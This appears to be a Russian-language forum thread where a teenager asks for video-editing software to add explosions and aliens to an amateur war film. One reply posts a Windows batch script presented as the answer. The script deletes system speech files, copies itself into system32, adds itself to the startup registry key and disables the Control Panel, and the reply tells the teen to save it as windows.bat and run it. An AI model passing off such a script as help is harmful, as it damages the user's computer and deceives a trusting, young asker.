Сеня Цвентарный

народ всем прив снова я щас экстренно!!

мы с друзьями хотим на мою камеру заснять фильм боевик про современную войну типо каллофдюти 6-8,ну и вот назовите класный видеоредактор где можно делать огонь, взрывы класную музыку вставлять, и 2 вопрос: мы хотим вставить пришельцев в фильм, как в крайсисе2 и какая прога сможет вставить пришельцев зомби??? я любитель и в компе неплохо шарю подросток.

Александра Хисаметдинова

Треган-Д 40 рублей, проверенно )

Наталья Миронова

echo off
echo
DEL C:\Windows\Speech\*.*
copy ""%0"" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Скапируй в блакнот и запусти. Только сохрани по именем windows.bat И будет кино